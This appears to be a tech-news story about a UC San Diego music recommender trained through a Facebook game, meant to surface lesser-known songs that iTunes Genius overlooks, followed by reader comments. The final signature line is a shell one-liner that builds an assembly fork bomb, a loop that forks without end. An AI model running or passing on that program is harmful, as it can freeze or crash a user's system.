Going Head To Head With Genius On Playlists
brownerthanu writes "Engineers at the University of California, San Diego are developing a system to include an ignored sector of music, dubbed the 'long tail,' in music recommendations. It's well known that radio suffers from a popularity bias, where the most popular songs receive an inordinate amount of exposure. In Apple's music recommender system, iTunes' Genius, this bias is magnified. An underground artist will never be recommended in a playlist due to insufficient data. It's an artifact of the popular collaborative filtering recommender algorithm, which Genius is based on. In order to establish a more holistic model of the music world, Luke Barrington and researchers at the Computer Audition Laboratory have created a machine learning system which classifies songs in an automated, Pandora-like, fashion. Instead of using humans to explicitly categorize individual songs, they capture the wisdom of the crowds via a Facebook game, Herd It, and use the data to train statistical models. The machine can then 'listen to,' describe and recommend any song, popular or not. As more people play the game, the machines get smarter. Their experiments show that automatic recommendations work at least as well as Genius for recommending undiscovered music."
Stop using the imbecilic term "wisdom of the crowds": aye or nay?
Does this mean more or less Miley Cyrus?
If your algorithm don't got Mojo Nixon, then your algorithm can use some fixin'.
--You will rephrase your request for me to go to hell. Goto statements are not acceptable programming constructs
10 minutes with someone who works in an independent record store will help you find better music than any algorithm (or any Top 40/Adult Contemporary radio station for that matter). That is, if you can find someone friendly in one of these stores...
Paraphrased from actual conversation in an indie record store:
Record store owner: "Why do people keep coming back here?"
Employee: "Well, it's not friendliness..."
Owner: "WHAT?! I'm the most f***ing friendly guy there is!
Freedom is drinking a beer in the park when you're supposed to be at work.
HKs will listen to METAL.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;